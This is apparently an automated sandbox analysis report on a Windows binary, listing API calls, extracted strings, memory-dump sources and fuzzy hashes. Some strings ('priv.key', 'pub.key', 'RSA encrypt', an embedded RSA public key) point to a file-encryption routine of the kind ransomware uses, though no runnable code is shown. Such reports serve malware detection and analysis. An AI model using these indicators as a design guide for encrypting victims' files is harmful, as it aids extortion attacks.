                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187C7C
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187C82
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187C88
                                • Concurrency::cancel_current_task.LIBCPMT ref: 01187C8E
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187C94
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187C9A
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187CA6
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187CAC
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187CB2
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01187CB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Crypt$Concurrency::cancel_current_taskContextRandomRelease__std_exception_copy
                                • String ID: 0@@$0i@$0O$Cpriv.key$Cpub.key$keygen $pzB${B
                                • API String ID: 1243268891-889905148
                                • Opcode ID: e4d4caff5c98b7c0d92a5f0e742d3c3a1497e3e94a1689f1df92a2e22347d9e3
                                • Instruction ID: 1c29c1d2fa803143c2b15bcbc5a028823f743b0986448899cc704ded5dfeeceb
                                • Opcode Fuzzy Hash: e4d4caff5c98b7c0d92a5f0e742d3c3a1497e3e94a1689f1df92a2e22347d9e3
                                • Instruction Fuzzy Hash: CA928A32624BC199EB24DF24E8903ED3BA1F79579CF509216DA9D47BA8EF74C294C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 808467561-2761157908
                                • Opcode ID: b585cc866ddd2876f35711326a4d5a0a595d59790e20d659255c6c7e6b743eae
                                • Instruction ID: f3016fa0a3d73e638f126ef9324e9504d18b714f956bb1aeb340486153ab17c8
                                • Opcode Fuzzy Hash: b585cc866ddd2876f35711326a4d5a0a595d59790e20d659255c6c7e6b743eae
                                • Instruction Fuzzy Hash: 0EA2E2F26202928BDB2ACF69D540BED3BA5F3D8788F405229DB46A7F48DB75C544CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32 ref: 011D843F
                                  • Part of subcall function 011AE3D0: Concurrency::cancel_current_task.LIBCPMT ref: 011AE550
                                  • Part of subcall function 011AE3D0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE556
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D8893
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D8899
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D889F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D88A5
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011D88AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskErrorLast
                                • String ID: operation failed with error $OS_Rng: $OS_Rng:
                                • API String ID: 2277578949-1042714665
                                • Opcode ID: 0ca0501f9aef3e792951e0c17fec7444240b9156aa0f7007b081f6215ff61356
                                • Instruction ID: 2c0f30965cec14738671ff9a1f463a8cbcb00360d43d4a66e31b34275b8b4f63
                                • Opcode Fuzzy Hash: 0ca0501f9aef3e792951e0c17fec7444240b9156aa0f7007b081f6215ff61356
                                • Instruction Fuzzy Hash: 50D1A832B10B848AEB08CBA9E45079D3772E759B98F908615CF5C17B98DF78C095C380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,011D8B39), ref: 011D82CC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,011D8B39), ref: 011D82D6
                                • CryptAcquireContextA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,011D8B39), ref: 011D82F9
                                • CryptAcquireContextA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,011D8B39), ref: 011D831C
                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,011D8B39), ref: 011D834C
                                • __std_exception_copy.LIBVCRUNTIME ref: 011D83BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: AcquireContextCrypt$ErrorLast$__std_exception_copy
                                • String ID: ($CryptAcquireContext$Crypto++ RNG
                                • API String ID: 3252210402-440840224
                                • Opcode ID: e67f23d13138b1d97e0ef5928db4c11fc3af7393b8f397e5358479769411d23a
                                • Instruction ID: 88480b635167e3467184f67c711800083aad803629d41bf3cb59208c5dc5a320
                                • Opcode Fuzzy Hash: e67f23d13138b1d97e0ef5928db4c11fc3af7393b8f397e5358479769411d23a
                                • Instruction Fuzzy Hash: 32318D32314B45D6EB10DF25F89079A7361FBA8B88F849121DA8D47728EF7CC1A9CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Auth$Cent$Genu$Hygo$auls$aurH$cAMD$enti$ineI$nGen$ntel$uine
                                • API String ID: 0-2607262942
                                • Opcode ID: d92065e310243a614ba278216be7735619fef9fde55a4ae4ee84407085596865
                                • Instruction ID: e6e9daa9fdca6589304b68570702a8b55100422ce59ab2e0262bb84e8ad3e4c1
                                • Opcode Fuzzy Hash: d92065e310243a614ba278216be7735619fef9fde55a4ae4ee84407085596865
                                • Instruction Fuzzy Hash: C2814732E0DA508FFB2DCFBDA9553EC2BE17B19344F59402AD94693B66C7388450CB0A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0122CC38: GetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CC47
                                  • Part of subcall function 0122CC38: SetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CCE5
                                • EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,01229A39), ref: 012399F3
                                • GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 01239A0C
                                • ProcessCodePage.LIBCMT ref: 01239A36
                                • IsValidCodePage.KERNEL32 ref: 01239A48
                                • IsValidLocale.KERNEL32 ref: 01239A5E
                                • GetLocaleInfoW.KERNEL32 ref: 01239ABA
                                • GetLocaleInfoW.KERNEL32 ref: 01239AD6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                • String ID: x!N
                                • API String ID: 3939093798-3092814222
                                • Opcode ID: 1501864d6d63e534ce1a7bfd048816032f95100029b87197029ba22f3aac9f3c
                                • Instruction ID: da502a406fce5754661d24ee45f286ccedae0b37c427a5445d5b32b0a1ed8eea
                                • Opcode Fuzzy Hash: 1501864d6d63e534ce1a7bfd048816032f95100029b87197029ba22f3aac9f3c
                                • Instruction Fuzzy Hash: EA6199B37207528AEF119F68D8507EC37B0BB9AB48F448126CF1A57794EBB8C096C350
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B20D2
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B24AC
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B2587
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn
                                • String ID: 0$0$0$0
                                • API String ID: 3668304517-3558443385
                                • Opcode ID: cd8b5dbf121db77c9590256138bee8ae11d183470191013d5b3955e80d79e1a0
                                • Instruction ID: 796ffca70c91c76b0bd792d28f78fd5b171978c3c43d0a103e31bc52121d6aba
                                • Opcode Fuzzy Hash: cd8b5dbf121db77c9590256138bee8ae11d183470191013d5b3955e80d79e1a0
                                • Instruction Fuzzy Hash: F342FB22714B8199EF28DB68E4943ED2BA2F785798F484516DF8D07B98DF78D189C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_taskCrypt$ContextRandomRelease__std_exception_copy
                                • String ID: 0@@$0i@$0O$RSA encrypt $pS@${B
                                • API String ID: 2147088305-3345703847
                                • Opcode ID: 9b46a82d03873ee497b5c818143a7f84ea3f56c5282f785aa201ccf942986cf5
                                • Instruction ID: 795e511280f18c6aaf557fb3839c88e05fc3699a0924d309f83def702f1e5122
                                • Opcode Fuzzy Hash: 9b46a82d03873ee497b5c818143a7f84ea3f56c5282f785aa201ccf942986cf5
                                • Instruction Fuzzy Hash: 2FD15B32A19FC596D764DB10E8903EAB3A4F7E9748F419226DACD42B25EF78D1E4C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0122CC38: GetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CC47
                                  • Part of subcall function 0122CC38: SetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CCE5
                                • TranslateName.LIBCMT ref: 01238ED5
                                • TranslateName.LIBCMT ref: 01238F10
                                • GetACP.KERNEL32(?,?,?,00000000,00000092,01229A40), ref: 01238F55
                                • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,01229A40), ref: 01238F7D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ErrorLastNameTranslate$CodePageValid
                                • String ID: utf8$x!N
                                • API String ID: 2136749100-3187725136
                                • Opcode ID: 753697aa5bd6498d0e5e3e3135c36eceb570754e7069a51c71cb1d734637de0c
                                • Instruction ID: 5df695e11ced07dd18567e7c946eb85c618ccc2483c87d6a983e83489024dda4
                                • Opcode Fuzzy Hash: 753697aa5bd6498d0e5e3e3135c36eceb570754e7069a51c71cb1d734637de0c
                                • Instruction Fuzzy Hash: 5881DEB232074286EB24EF66E8403AE7765F7D5B84F848621DF494B794EFB8C5A1C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B20D2
                                  • Part of subcall function 011B5390: __std_exception_copy.LIBVCRUNTIME ref: 011B548D
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B24AC
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B2587
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                • String ID: 0$0$0$0
                                • API String ID: 1944019136-3558443385
                                • Opcode ID: 259acab52fd0b7845c1dea1efe300a005d74b11e535572b6384b61e1ed2e63b7
                                • Instruction ID: 447ad5ebadc2d039abdecd46f601dc39b57f951740b78d7b3afd6d20505fb58b
                                • Opcode Fuzzy Hash: 259acab52fd0b7845c1dea1efe300a005d74b11e535572b6384b61e1ed2e63b7
                                • Instruction Fuzzy Hash: 15028832714B8199EB29DBA8E8843ED3BB2F785798F440516DB8D17B98DF78D189C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlCaptureContext.KERNEL32 ref: 01221941
                                • RtlLookupFunctionEntry.KERNEL32 ref: 01221959
                                • RtlVirtualUnwind.KERNEL32 ref: 01221994
                                • IsDebuggerPresent.KERNEL32 ref: 012219CD
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 012219D7
                                • UnhandledExceptionFilter.KERNEL32 ref: 012219E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 85c943ca478680d6fef7ce0f9227fcd14ee2c1ae0be62709a310ad844dc4a73b
                                • Instruction ID: d18fa8ac4369da510d6493ec5fe6fabdaed972a277845e58d1ec51a48ec78c7e
                                • Opcode Fuzzy Hash: 85c943ca478680d6fef7ce0f9227fcd14ee2c1ae0be62709a310ad844dc4a73b
                                • Instruction Fuzzy Hash: F8315C36314F8196DB24CF69E8407AE77A4F798798F54022AEB9D47B58EF38C165CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastWrite$Console
                                • String ID:
                                • API String ID: 786612050-0
                                • Opcode ID: a05cac6140e7e5dbefc5b3e0a0b872df83229d8f2c7e0d56629735b21c18209d
                                • Instruction ID: 91ce8361c1abf46d19d75dc8a7db708b9f0dac04e3f623e145e95cb8a52cd664
                                • Opcode Fuzzy Hash: a05cac6140e7e5dbefc5b3e0a0b872df83229d8f2c7e0d56629735b21c18209d
                                • Instruction Fuzzy Hash: F6D11272724B94AADB01CFA8D5402ED7BB2F749BD8F554216DF8E47B58DA38C11AC340
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 011F213B
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: DebugDebuggerErrorLastOutputPresentString
                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                • API String ID: 389471666-631824599
                                • Opcode ID: 54d213708a27687b9e2dfdf9d5cf730040fffd75e2154084b3e69917e2761bfc
                                • Instruction ID: 917890e3a0354c18bf9e0ee1f4e1f7919b368c0f5cfa78f47e9ae2e93d750d86
                                • Opcode Fuzzy Hash: 54d213708a27687b9e2dfdf9d5cf730040fffd75e2154084b3e69917e2761bfc
                                • Instruction Fuzzy Hash: 4311C432310B8597E708DB26DA443AD33A0FB54745F405129CB5943A64EF78D0B8C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B2D95
                                Strings
                                • RoundUpToMultipleOf: integer overflow, xrefs: 011B29E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn
                                • String ID: RoundUpToMultipleOf: integer overflow
                                • API String ID: 3668304517-1120416164
                                • Opcode ID: 2340e45221e707bb584eea9adfc8286ec7c3c13a2fdd9c2776c4fb26c45744fe
                                • Instruction ID: 651ff055527d48d9b45db297a0bcf974c67f41d8946123f9419f1a79369cf367
                                • Opcode Fuzzy Hash: 2340e45221e707bb584eea9adfc8286ec7c3c13a2fdd9c2776c4fb26c45744fe
                                • Instruction Fuzzy Hash: 2832B933324B859ADB20DF69E8907DE7B61F799798F444216EA9D43BA8DF78C109C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _Wcsftime.LIBCMT ref: 01225836
                                • _Wcsftime.LIBCMT ref: 012257D7
                                  • Part of subcall function 01229D70: _invalid_parameter_noinfo.LIBCMT ref: 01229D9B
                                Strings
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 01225794
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Wcsftime$_invalid_parameter_noinfo
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 4239037671-3729741635
                                • Opcode ID: 47d0f6c1ddddef16f80c9c603fb7a891e8544a84dbeabaae8bdf4e685568333d
                                • Instruction ID: 2760d054f681428157b81d0c29718f1817a1e0ba937ac047be122e9b4966aed2
                                • Opcode Fuzzy Hash: 47d0f6c1ddddef16f80c9c603fb7a891e8544a84dbeabaae8bdf4e685568333d
                                • Instruction Fuzzy Hash: 6871B272720B6196EB24CF29D4943AD2760FB88BE8F548626DF6E97794DF78C091C340
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CryptGenRandom.ADVAPI32 ref: 011D8B4C
                                • CryptReleaseContext.ADVAPI32 ref: 011D8B67
                                  • Part of subcall function 011D8400: GetLastError.KERNEL32 ref: 011D843F
                                  • Part of subcall function 01210818: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 0121085C
                                  • Part of subcall function 01210818: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,011EFCD6), ref: 012108A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Crypt$ContextErrorExceptionFileHeaderLastRaiseRandomRelease
                                • String ID: CryptGenRandom
                                • API String ID: 3931889421-3616286655
                                • Opcode ID: cc7ff152d6e9a6f94fc3d3c6b6b5e906e8d38d1011937dc0094f2a4ab4c53f1e
                                • Instruction ID: 135ee56e224a5d00b56ff199d354e0b44f72951ee326e3141383f106a114351f
                                • Opcode Fuzzy Hash: cc7ff152d6e9a6f94fc3d3c6b6b5e906e8d38d1011937dc0094f2a4ab4c53f1e
                                • Instruction Fuzzy Hash: FA31A232314A9592EB64EF15F85079EA764F7D8BE8F885221DA9D83B64DF38C506CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 0122D5B9
                                • GetLocaleInfoW.KERNEL32(?,?,?,?,?,01229C13), ref: 0122D5E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: InfoLocaletry_get_function
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2200034068-2904428671
                                • Opcode ID: d0e6322e6d5584c00e0e0a6712fef775ffa0f026ad854213ec6a4974b25eddb4
                                • Instruction ID: 09ffcbdb44528e11d3f981c888943ec56156394bce70ca5a8fe4b87e26613e24
                                • Opcode Fuzzy Hash: d0e6322e6d5584c00e0e0a6712fef775ffa0f026ad854213ec6a4974b25eddb4
                                • Instruction Fuzzy Hash: EAF0AF35710B94D2E7049BA6B98039AB761F7A4BD0F988026DF4853B69CF78C5628380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: memcpy_s
                                • String ID:
                                • API String ID: 1502251526-0
                                • Opcode ID: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
                                • Instruction ID: 76b3237aaa16a9657fb8549a1a327108ff8b572ab1a47f01ba71060dbda436c8
                                • Opcode Fuzzy Hash: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
                                • Instruction Fuzzy Hash: 20B1D6B372469A9BDB34CF19E184A6EBBA1F398784F448129DF4A47B04E73DD845CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0122F1B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: gfffffff
                                • API String ID: 3215553584-1523873471
                                • Opcode ID: beda6cfc5bfca348f3213292f0555f7cff378f820cb62970de094d3b6008c622
                                • Instruction ID: 92b51ad576041de43aa84bc65bca54f520e32fc7677d97c9a1ab2c08ec05852b
                                • Opcode Fuzzy Hash: beda6cfc5bfca348f3213292f0555f7cff378f820cb62970de094d3b6008c622
                                • Instruction Fuzzy Hash: 46819467B257D986DF12CB2AE1007ADBBB5E7A5BC4F098022CF4947355EA7DC102C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 0122FA15
                                  • Part of subcall function 01221B2C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,01221AD9), ref: 01221B35
                                  • Part of subcall function 01221B2C: GetCurrentProcess.KERNEL32(?,?,?,?,01221AD9), ref: 01221B5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
